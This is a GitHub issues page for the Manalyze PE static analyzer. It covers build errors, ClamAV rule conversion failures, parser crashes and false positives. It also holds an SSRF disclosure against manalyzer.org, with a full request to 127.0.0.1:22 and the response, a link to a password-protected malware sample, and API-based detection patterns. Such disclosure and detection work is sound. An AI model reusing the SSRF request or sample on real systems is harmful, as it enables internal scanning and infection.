justicerage / manalyze Goto Github PK
View Code? Open in Web Editor NEWA static analyzer for PE executables.
License: GNU General Public License v3.0
A static analyzer for PE executables.
License: GNU General Public License v3.0
It was reported that PE files with a very high number of sections cause the analysis to be extremely slow.
The issue has been traced down to Section::get_raw_data()
which opens and closes the input file with every call. The file handle should be cached and sanity checks need to be put in place to prevent unnecessary operations.
The result of PE::get_filesize
should also be cached instead of being computed with every call.
Unusual section name found: .detourc
Unusual section name found: .detourd
These sections are added by detours:
https://github.com/microsoft/Detours/blob/master/src/disasm.cpp#L147
Reference:
https://github.com/microsoft/Detours
ld: unknown option: -rpath=$ORIGIN
clang: error: linker command failed with exit code 1 (use -v to see invocation)
make[2]: *** [bin/manalyze] Error 1
make[1]: *** [CMakeFiles/manalyze.dir/all] Error 2
make: *** [all] Error 2
An extra null pointer check is not needed in functions like the following.
Visual studio has a standardized PE format for delay loaded imports.
False positive for:
The PE is possibly packed.
Unusual section name found: .didat
This is:
"Delayload import table in its own .didat section"
Reference:
https://docs.microsoft.com/en-us/windows/win32/debug/pe-format
In need of suggestions. I'm not familiar with protocol.
Hello,
While updating our FileInfo Analyzer (TheHive Project) to include manalyzer binaries, we face lots of errors with the update of yara rules in clamav (bin/update_clamav_signatures.py):
[..]
Rule Win.Trojan.Emotet-9778251-0 seems to be malformed. Skipping...
Rule Win.Trojan.Generic-9778253-0 seems to be malformed. Skipping...
Rule Win.Malware.Fsysna-9778257-0 seems to be malformed. Skipping...
Rule Win.Packed.Vobfus-9778258-0 seems to be malformed. Skipping...
Rule Win.Trojan.Azorult-9778259-0 seems to be malformed. Skipping...
Rule Win.Malware.Sctk-9778260-0 seems to be malformed. Skipping...
Rule Win.Trojan.Fareit-9778261-0 seems to be malformed. Skipping...
Rule Win.Trojan.Fareit-9778262-0 seems to be malformed. Skipping...
Rule Win.Trojan.Generic-9778278-0 seems to be malformed. Skipping...
Rule Win.Malware.Zusy-9778280-0 seems to be malformed. Skipping...
[..]
I also tried to run it from the docker image and get similar results.
I noticed that Manalyzer sometimes return a false positive when one brand's name is a substring of another. Here's an example: https://manalyzer.org/report/738583111ef0f36a57348bb735f6a3cc
The executable is supposed to be an installer for JetBrains' IntelliJ Platform, but Manalyzer thinks its a fake Intel program.
System info:
uname -svrom: Linux 4.9.0-1-amd64 #1 SMP Debian 4.9.6-3 (2017-01-28) x86_64 GNU/Linux lsb_release -c: stretch
When invoking command: make
The following error appear:
/home/pierre/Manalyze/plugins/plugin_virustotal/plugin_virustotal.cpp: In function ‘bool plugin::vt_api_interact(const string&, const string&, std::__cxx11::string&, plugin::sslsocket&)’: /home/pierre/Manalyze/plugins/plugin_virustotal/plugin_virustotal.cpp:276:84: error: ‘SSL_R_SHORT_READ’ was not declared in this scope if (error != boost::asio::error::eof && error.value() != ERR_PACK(ERR_LIB_SSL, 0, SSL_R_SHORT_READ)) { ^ CMakeFiles/plugin_virustotal.dir/build.make:62 : la recette pour la cible « CMakeFiles/plugin_virustotal.dir/plugins/plugin_virustotal/plugin_ virustotal.cpp.o » a échouée
Hi,
in case Resource::extract()
is called with an invalid destination
argument the calling process segfaults because fwrite()
tries to write to a FILE *
object which in fact is NULL.
I'd consider this a minor bug, since one could argue using the API in a wrong way is the user's fault. However in that case you may want to avoid the segmentation fault and guide your users by providing an appropriate error message.
So a patch could look sth. like the following (disclaimer: untested!):
FILE* out = fopen(destination.string().c_str(), "a+");
+ if(out == nullptr) {
+ PRINT_ERROR << "Opening file " << destination.string().c_str() << " failed!" << std::endl;
+ return false;
+ }
Cheers
rc0r
For example, a COM dll needs functions such as DllRegisterServer
and DllCanUnloadNow
.
boost::scoped_array<boost::uint32_t> names(new boost::uint32_t[ied.NumberOfNames]);
boost::scoped_array<boost::uint16_t> ords(new boost::uint16_t[ied.NumberOfNames]);
if ied.NumberOfNames is sufficently big, there will be unhandled bad alloc exception.
Sample (pass: infected):
https://mega.nz/#!V5pEgARQ!qwQsCH3enmjnv9--x_d4WDYyZpja1au2NYokzKKT7sQ
Hello team,
I've detected a version disclosure (Nginx) in the target web server's HTTP response. This information might help an attacker gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Nginx.
URL: https://manalyzer.org/
HTTP Response:
HTTP/1.1 200 OK
Server: nginx/1.2.1
Connection: keep-alive
Content-Encoding:
Strict-Transport-Security: max-age=15768000
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Date: Tue, 11 Apr 2017 00:02:26 GMT
identified version: 1.2.1
and you are using an out-of-date version of Nginx. Since this is an old version of the software, it may be vulnerable to attacks.
Hi!
I have a problem with the Yara rules. When I try to run an analysis (Example: manalyze sample.exe -p strings), I have the following error:
[!] Error: Could not load yara_rules/suspicious_strings.yara!
[!] Error: Could not load yara_rules/domains.yara!
* Manalyze 0.9 *
I checked the folder "/usr/local/manalyze/yara_rules" and there are Yara's rules.
Can you help me with this problem, please?
CAUTION: malware attached
The file in the attached zip gives an infinite loop when parsing resources, spamming the following error messages:
[*] Warning: The PE contains duplicate resources. It was almost certainly crafted manually.
[*] Warning: Could not locate the section containing resource 65280. Trying to use the RVA as an offset...
[*] Warning: Resource 65280 has a size of 0!
Seems to be related to size 0 resources.
FILE* f = fopen(_path.c_str(), "rb");
if (f == nullptr || fseek(f, _pointer_to_raw_data, SEEK_SET))
{
fclose(f);
return res;
}
This condition is wrong, if (f == nullptr) will trigger fclose(nullptr) which will lead to crash.
I found that Manalyze can run in Win7. But it did not work in WinXP.
Is it true?
Hi,
I came across just another minor issue. Consider the following:
int main(int argc, char *argv[]) {
// check argc == 2
mana::PE pe(argv[1]);
pe.get_raw_bytes(-1);
return 0;
}
In case argv[1]
is set to a nonexistent file this will segfault during fseek()
called from PE::get_raw_bytes()
since PE::_file_handle
is not initialized and doesn't point to a proper FILE
object.
Since all the other methods of the PE
class that operate on _file_handle
have a nullptr
check I assumed such a check wasn't intentionally omitted.
Cheers
rc0r
error info:
C:\Users\xxx\Desktop\manalyze>manalyze.exe --plugins=peid,clamav --dump all Churrasco.exe
[!] Error: [Yara compiler] yara_rules/clamav.yara(845778) : internal fatal error
i am confused how to use it on win7 and how yara integrate it ? thanks
Hello,
This might be a case of user error, but when I try to run parse_clamav.py against a custom set of clam rules (https://raw.githubusercontent.com/wmetcalf/clam-punch/master/miscreantpunch099.ldb) it'll generate an error
Unable to understand the following offset: 48344426616d703b48354126616d703b*48353426616d703b48363826616d703b48363926616d703b48373326616d703b48323026616d703b48373026616d703b48373226616d703b48366626616d703b48363726616d703b48373226616d703b48363126616d703b48366426616d703b
This appears to be from this line in the ldb file.
MiscreantPunch.EXEInsideOfDoc.ASASCII.2;Target:0;(0);48344426616d703b48354126616d703b*48353426616d703b48363826616d703b48363926616d703b48373326616d703b48323026616d703b48373026616d703b48373226616d703b48366626616d703b48363726616d703b48373226616d703b48363126616d703b48366426616d703b::i
Any help you can give would be greatly appreciated!
This is a snippet of the output. It seems nearly every rule breaks this.
Rule Win.Downloader.Upatre-9937450-0 seems to be malformed. Skipping...
Rule Win.Downloader.Upatre-9937452-0 seems to be malformed. Skipping...
Rule Win.Downloader.Upatre-9937455-0 seems to be malformed. Skipping...
Rule Win.Trojan.Generic-9937463-0 seems to be malformed. Skipping...
Rule Win.Ransomware.TeslaCrypt-9937465-0 seems to be malformed. Skipping...
Rule Win.Downloader.Stantinko-9937476-0 seems to be malformed. Skipping...
Rule Win.Trojan.Emotet-9937498-0 seems to be malformed. Skipping...
Rule Win.Packed.Msilzilla-9937499-0 seems to be malformed. Skipping...
LoadDriver
Yet another LoadLibrary replacement
LoadTypeLib
Possible LoadLibrary replacement?
waveInOpen|DirectSoundCaptureCreate
Records audio
EnableRouter|SetAdapterIpAddress|SetIpInterfaceEntry
Messes with the network configuration
OleGetClipboard
Reads the clipboard
CertAddCertificateContextToStore|CertOpenSystemStore
Manipulates the system certificate store
InitiateShutdown|ExitWindows
Turns the system off
Wmi*
Uses WMI
SHTestTokenMembership|CheckTokenMembership|IsUserAnAdmin
Checks for privileges
SHEnumKeyEx
Another way to access the registery
Analysis of this sample
8323af43ff507b82c87b38b45ea4c79fae4b49ed453590101373c18aae96b8fb does not end.
$ ./bin/manalyze --output=json 8323af43ff507b82c87b38b45ea4c79fae4b49ed453590101373c18aae96b8fb
I investigated a little bit, and I suspect that the parsing logic of resources contains some bugs.
I think that recursive parse of resources tree does not end properly.
Hi there,
I'm trying to install Manalyze following the instructions on the documentation in the Linux section.
uname -a
Output:
Linux 4.18.0-17-generic #18~18.04.1-Ubuntu SMP Fri Mar 15 15:27:12 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
When I run sudo cmake .
I get the following error stacktrace:
james@james-Aspire-VN7-593G:/home/Manalyze$ sudo cmake .
[sudo] password for james:
-- The C compiler identification is GNU 7.3.0
-- The CXX compiler identification is GNU 7.3.0
-- Check for working C compiler: /usr/bin/cc
-- Check for working C compiler: /usr/bin/cc -- works
-- Detecting C compiler ABI info
-- Detecting C compiler ABI info - done
-- Detecting C compile features
-- Detecting C compile features - done
-- Check for working CXX compiler: /usr/bin/c++
-- Check for working CXX compiler: /usr/bin/c++ -- works
-- Detecting CXX compiler ABI info
-- Detecting CXX compiler ABI info - done
-- Detecting CXX compile features
-- Detecting CXX compile features - done
-- Found Git: /usr/bin/git (found version "2.17.1")
-- Boost version: 1.65.1
-- Found the following Boost libraries:
-- regex
-- system
-- filesystem
-- program_options
-- Found OpenSSL: /usr/lib/x86_64-linux-gnu/libcrypto.so (found version "1.1.0g")
Checking out yara...
Cloning into 'external/yara'...
fatal: unable to access 'https://github.com/JusticeRage/yara.git/': Could not resolve host: github.com
Checking out hash-library...
Cloning into 'external/hash-library'...
CMake Error at CMakeLists.txt:131 (add_subdirectory):
add_subdirectory given source "external/yara" which is not an existing
directory.
-- Configuring incomplete, errors occurred!
See also "/home/Manalyze/CMakeFiles/CMakeOutput.log".
Any assistance would be greatly appreciated!
Many thanks
It seems that on Windows, when Manalyze is called from cmd.exe
(and possibly other conditions), external plugins are not detected at all. The issue does not appear when using Powershell or the Git shell.
Does it support Mac os?
Hi
I am writing to you regarding an issue I encountered while installing the Manalyze program. After installing the necessary dependencies, when I proceeded to execute the command "make -j5," I encountered the following error:
/home/rpadmin/Manalyze-master/plugins/plugin_virustotal/json_spirit/json_spirit_reader_template.h:446:114: error: ‘boost::placeholders’ has not been declared
Uint64_action new_uint64 ( boost::bind( &Semantic_actions_t::new_uint64, &self.actions_, boost::placeholders::_1 ) );
I believe this error is related to the use of 'boost::placeholders' in the code, which seems to be causing a declaration issue. In order to resolve this problem, I would greatly appreciate your guidance and assistance.
Could you please provide me with instructions on how to address this error? I would be grateful for any insights or suggestions you can offer. I am eager to successfully install and utilize the Manalyze program for my needs.
Thank you for your attention to this matter. I look forward to your prompt response.
OS: UbuntuServer 16.04
For some reason my dll has an empty exports section.
A documentation page should be added to explain how to write Yara rules that rely on manalyze's parser.
C:\Users\50CAL\Manalyze\bin\yara_rules>python update_clamav_signatures.py
Downloading: main.cvd Bytes: 117892267
Rule Win.Trojan.EOL-1 seems to be malformed. Skipping...
The latest ClamAV rules are not converted properly and cause the ClamAV plugin to be dysfunctional.
[!] Error: Could not compile yara rules (1 error(s)).
[!] Error: ClamAV rules haven't been generated yet!
[!] Error: Please run yara_rules/update_clamav_signatures.py to create them, and refer to the documentation for additional information.```
Hello,
In the file bin/yara_rules/peid.yara, the rule for PolyEnE_0_01__by_Lennart_Hedlund should be deleted because it detects false positives.
So please remove the following lines :
rule PolyEnE_0_01__by_Lennart_Hedlund
{
meta:
packer_name = "PolyEnE 0.01+ by Lennart Hedlund"
strings:
$a0 = { 60 00 00 E0 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 60 00 00 E0 }
condition:
$a0
}
This is from the proxy stub code generated by midl.
Example: test_p.c
/* this ALWAYS GENERATED file contains the proxy stub code */
/* File created by MIDL compiler version 8.01.0628 */
...
#pragma code_seg(".orpc")
static const unsigned short IChildFrame_FormatStringOffsetTable[] =
{
0,
42,
84,
126
};
Manalyze/plugins/plugin_imports.cpp
Line 35 in d2fe760
are you missing an OR (|) at the end of the line?
Where can I learn to use the functions in the windows.h file ?
Hi,
fuzzing manalyze
discovered the following crash:
original sample - DoS.dll (28K) (md5: acf1bffb70226d182bc0fef847f5c867)
The crash surfaced because afl-fuzz
uses a memory limit during fuzzing. Running manalyze
directly on the provided sample did not crash the process on my quite decent box. However massive amounts of virtual memory (>80Gb) were used when processing the file. This probably just didn't cause any real havoc because I have quite a large swap partition. Nevertheless this whole process bogged down my box for several minutes:
$ time manalyze DoS.dll
# ...
manalyze 170.76s user 280.52s system 65% cpu 11:28.31 total
To simulate a less powerful machine I used ulimit -v 10000000
limiting the virtual memory to ~10G. Using this setup manalyze
SIGABRT's very soon:
$ ulimit -v 10000000 # kbytes
$ time manalyze DoS.dll
# ...
terminate called after throwing an instance of 'std::bad_alloc'
what(): std::bad_alloc
[2] 17055 abort (core dumped) ./manalyze
manalyze 7.59s user 8.62s system 14% cpu 1:52.14 total
$ ls -l core.17055
-rw------- 1 rc0r rc0r 9.5G Oct 24 11:20 core.17055
I did not try running this on a system with much less memory available then I had. But at best I'd expect the memory allocation to fail as in the ulimit
ed test I did.
Let me know if you need any further info or assistance in order to diagnose the problem!
Ran the clamav update script but when running manalyze it does not compile the yara rules due to syntax errors
[!] Error: [Yara compiler] yara_rules/clamav.yara(972693) : syntax error, unexpected '{', expecting text string
[!] Error: [Yara compiler] yara_rules/clamav.yara(1003499) : syntax error, unexpected string identifier, expecting '}'
[!] Error: Could not compile yara rules (2 error(s)).
[!] Error: ClamAV rules haven't been generated yet!
[!] Error: Please run yara_rules/update_clamav_signatures.py to create them, and refer to the documentation for additional information.
I have run yara_rules/update_clamav_signatures.py
however it seems to skip a lot of rules due to them being malformed.
E-mail received a few days ago:
I've been using your Manalyzer for a few days on Linux to try to triage some binaries. Thanks for all your work, btw. I'd like to start using it on a wider basis and would like to be able to do a "make install" to have it available to everyone on my Linux system. After a successful, build, though:
[gcomeaux@localhost Manalyze]$ make install
make: *** No rule to make target `install'. Stop.... Is there any way to easily get an installation with all dependencies in their proper place? I'm not a CMake expert, but there must be some way to specify a CMake target to get that working.
Thank you for any thoughts or suggestions.
EnumDeviceDrivers|GetDeviceDriverFileNameW
Checks for driversEvtClearLog|ClearEventLog
Empties the system event logTerminateProcess
Messes with other processesPrintWindow
Takes screenshotsSetKernelObjectSecurity|SetFileSecurity|SetNamedSecurityInfo|SetSecurityInfo
Manipulates DACLsOpenSCManagerW|CreateService|DeleteService
Manipulates servicesCoLoadLibrary
Replacement for LoadLibrary
Is there any way to save the JSON output to a file? I guess I could also parse through the console output, but it would be helpful to download it directly to a file.
I get that when I run update_clamav_signatures.py. Cropped result of this is below:
Rule Win.Dropper.Zeus-9956976-0 seems to be malformed. Skipping...
Rule Win.Malware.Generic-9956990-0 seems to be malformed. Skipping...
Unable to translate a logical signature for Win.Malware.Wingo-9956993-0. Skipping...
Rule Win.Virus.Expiro-9957000-0 seems to be malformed. Skipping...
Rule Win.Dropper.Zeus-9957002-0 seems to be malformed. Skipping...
Rule Win.Packed.Vbkryjetor-9957003-0 seems to be malformed. Skipping...
Rule Win.Malware.Conjar-9957004-0 seems to be malformed. Skipping...
Rule Win.Dropper.Detected-9957005-0 seems to be malformed. Skipping...
Rule Win.Dropper.Detected-9957006-0 seems to be malformed. Skipping...
Rule Win.Packed.Trojanx-9957008-0 seems to be malformed. Skipping...
Rule Win.Packed.Coantor-9957009-0 seems to be malformed. Skipping...
Rule Win.Packed.Msilheracles-9957011-0 seems to be malformed. Skipping...
Rule Win.Trojan.Generic-9957017-0 seems to be malformed. Skipping...
Rule Win.Packed.Generickdz-9957018-0 seems to be malformed. Skipping...
Rule Win.Dropper.LokiBot-9957019-0 seems to be malformed. Skipping...
Rule Win.Virus.Ramnit-9957027-0 seems to be malformed. Skipping...
Rule Win.Dropper.LokiBot-9957036-0 seems to be malformed. Skipping...
Rule Win.Dropper.Zeus-9957041-0 seems to be malformed. Skipping...
It happens for all of the downloaded updates
Clamav has recently started using Cloudflare to front their signature download page. If you use Python, then the response will be a 403. The text says that it wants cookies to be enabled. Using a web browser works fine to download the AV update package.
>>> import requests
>>> r = requests.get("http://database.clamav.net/daily.cvd")
>>> r
<Response [403]>
In malformed executables, section names may be composed of unprintable characters. These characters should be escaped to avoid outputting garbage to the console.
Use the data contained on this page to update the list of known packers and section names.
C:\Users\50CAL\Manalyze\bin\yara_rules>python update_clamav_signatures.py
Downloading: main.cvd Bytes: 117892267
Rule Win.Trojan.EOL-1 seems to be malformed. Skipping...
Downloading: daily.cvd Bytes: 41899296
Rule Eicar-Test-Signature already exists!
Unable to translate a logical signature for Html.Phishing.DropboxVM-1. Skipping...
Unable to translate a logical signature for Win.Worm.Njrat-2. Skipping...
Unable to translate a logical signature for Win.Trojan.B-468. Skipping...
Unable to translate a logical signature for Win.Dropper.Agent-1388636. Skipping...
Unable to translate a logical signature for Win.Dropper.Kuluoz-2905. Skipping...
Unable to translate a logical signature for Win.Trojan.Zbot-64725. Skipping...
Unable to translate a logical signature for Win.Downloader.Dalexis-24. Skipping...
Unable to translate a logical signature for Win.Trojan.Fareit-403. Skipping...
Unable to translate a logical signature for Win.Trojan.PoseidonURL-1. Skipping...
Unable to translate a logical signature for Win.Downloader.Upatre-6142. Skipping...
Unable to translate a logical signature for Legacy.Trojan.Agent-1388638. Skipping...
Unable to translate a logical signature for Win.Trojan.Mrblack-2. Skipping...
Unable to translate a logical signature for Win.Trojan.ProjectHook-1. Skipping...
Rule Win.Trojan.ssid18332-1 seems to be malformed. Skipping...
Unable to translate a logical signature for Win.Trojan.UPS-1. Skipping...
Unable to translate a logical signature for Win.Ransomware.Cerber-8. Skipping...
Unable to translate a logical signature for Win.Ransomware.Cerber-10. Skipping...
Rule Img.Exploit.CVE_2016_5684-1 seems to be malformed. Skipping...
Unable to translate a logical signature for Win.Trojan.Athena-5329665-0. Skipping...
Rule Txt.Downloader.Generic-5657804-1 seems to be malformed. Skipping...
Rule Txt.Downloader.Generic-5657855-0 seems to be malformed. Skipping...
Rule Win.Downloader.Upatre-5744087-0 seems to be malformed. Skipping...
Rule Win.Downloader.Upatre-5744089-0 seems to be malformed. Skipping...
Rule Win.Downloader.Upatre-5744090-0 seems to be malformed. Skipping...
Rule Win.Downloader.Upatre-5744092-0 seems to be malformed. Skipping...
Rule Win.Downloader.Upatre-5744093-0 seems to be malformed. Skipping...
Rule Win.Downloader.Upatre-5744094-0 seems to be malformed. Skipping...
Rule Win.Trojan.Xtreme-5744910-0 seems to be malformed. Skipping...
Unable to translate a logical signature for Win.Trojan.Vbswap-5909855-1. Skipping...
Unable to translate a logical signature for Win.Ransomware.Cerber-6162245-0. Skipping...
Rule Win.Exploit.CVE_2017_0080-6184298-0 seems to be malformed. Skipping...
Unable to translate a logical signature for Win.Ransomware.PyCL-6185098-3. Skipping...
Unable to translate a logical signature for Win.Trojan.ROKRAT-6189297-0. Skipping...
Unable to translate a logical signature for Win.Trojan.ROKRAT-6189299-0. Skipping...
Unable to translate a logical signature for Win.Trojan.Bladabindi-6196648-0. Skipping...
Unable to translate a logical signature for Win.Trojan.Bladabindi-6196650-0. Skipping...
Unable to translate a logical signature for Win.Virus.Hematite-6232506-0. Skipping...
Rule Swf.Exploit.CVE_2017_2934-6261685-0 seems to be malformed. Skipping...
Unable to translate a logical signature for Win.Trojan.Generic-6268209-0. Skipping...
Rule Win.Exploit.CVE_2016_3301-5259504-1 seems to be malformed. Skipping...
Rule Js.Downloader.Generic-6296416-0 seems to be malformed. Skipping...
Unable to translate a logical signature for Win.Trojan.Generic-6297788-0. Skipping...
Rule Win.Exploit.CVE_2017_3036-6309463-0 seems to be malformed. Skipping...
Rule Archive.Exploit.CVE_2017_2823-6316562-0 seems to be malformed. Skipping...
Unable to translate a logical signature for Win.Trojan.Generic-6323528-0. Skipping...
Rule Html.Exploit.CVE_2016_7288-6327688-0 seems to be malformed. Skipping...
Rule Win.Exploit.CVE_2017_2781-6316049-1 seems to be malformed. Skipping...
Unable to understand the following offset: 5c6a706567626c6970{-250}66666438
Hi manalyzer team
there an ssrf on the request via url upload , as you can see here ssh version u used is leaked in the Response :
POST /upload HTTP/1.1
Host: manalyzer.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------210165242507531672849060397
Content-Length: 186
Origin: https://manalyzer.org
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------210165242507531672849060397
Content-Disposition: form-data; name="url"
http://127.0.0.1:22/
-----------------------------210165242507531672849060397--
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Sun, 03 Oct 2021 14:26:10 GMT
Content-Type: application/json
Content-Length: 192
Connection: close
Strict-Transport-Security: max-age=63072000; includeSubdomains
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=63072000
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
{"data":{"error_message":"An error occurred while retrieving the requested file ((
'Connection aborted.', BadStatusLine('SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2\\r\\n')))."},"status":"failed"}
Attacker able to scan internal ports also can make a directory enumeration on http://127.0.0.1/$FUZZ$ ... for fixing block access to internal hosts
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.